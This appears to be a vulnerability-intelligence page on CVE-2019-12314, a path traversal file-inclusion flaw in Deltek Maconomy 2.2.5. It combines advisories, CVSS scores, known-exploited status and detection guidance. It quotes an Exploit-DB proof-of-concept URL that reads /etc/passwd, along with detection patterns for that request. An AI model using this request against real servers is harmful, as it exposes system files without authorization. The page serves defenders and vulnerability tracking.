CVE-2019-12314
published 2019-05-24CVE-2019-12314: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a…
PriorityP186critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
84.22%
99.7th percentile
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltek | maconomy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect LFI exploitation attempts against Deltek Maconomy by monitoring HTTP GET requests to the path pattern /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ followed by an absolute path traversal (e.g., //etc/passwd). The double-slash before the traversal path is characteristic of this exploit. ↗
- →A successful exploitation response will contain the string matching 'root:.*:0:0:' in the HTTP response body with a 200 status code, indicating /etc/passwd file contents were returned. ↗
- →Monitor for HTTP GET requests targeting the CGI endpoint /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ with PATH_INFO containing absolute paths (starting with //) as this is the exploitation vector. ↗
- ·The vulnerability is specific to Deltek Maconomy version 2.2.5. Detection rules should be scoped to this version or validated against the CPE before alerting. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-m2jw-qr8p-cx48: Deltek Maconomy 2
ghsa_unreviewed·2022-05-24
CVE-2019-12314 [CRITICAL] CWE-22 GHSA-m2jw-qr8p-cx48: Deltek Maconomy 2
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd URI.
VulnCheck
deltek maconomy Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 9.8
CVE-2019-12314 [CRITICAL] deltek maconomy Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
deltek maconomy Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
Affected: deltek maconomy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-12&host_type=src&vulnerability=cve-2019-12314; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-13&host_type=src&vulnerability=cve-2019-12314; https://dashboard.shadowserver.org
No detection rules found.
Exploit-DB
Deltek Maconomy 2.2.5 - Local File Inclusion
exploitdb·2019-05-27·CVSS 9.8
CVE-2019-12314 [CRITICAL] Deltek Maconomy 2.2.5 - Local File Inclusion
Deltek Maconomy 2.2.5 - Local File Inclusion
---
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:
POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
Nuclei
Deltek Maconomy 2.2.5 - Local File Inclusion
nuclei·CVSS 9.8
CVE-2019-12314 [CRITICAL] Deltek Maconomy 2.2.5 - Local File Inclusion
Deltek Maconomy 2.2.5 - Local File Inclusion
Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
Template:
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 - Local File Inclusion
author: madrobot
severity: critical
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or even a complete compromise of the affected system.
remediation: |
Apply the latest secur
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.htmlhttps://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txthttps://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xmhttp://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.htmlhttps://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txthttps://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm
2019-05-24
Published
Exploited in the wild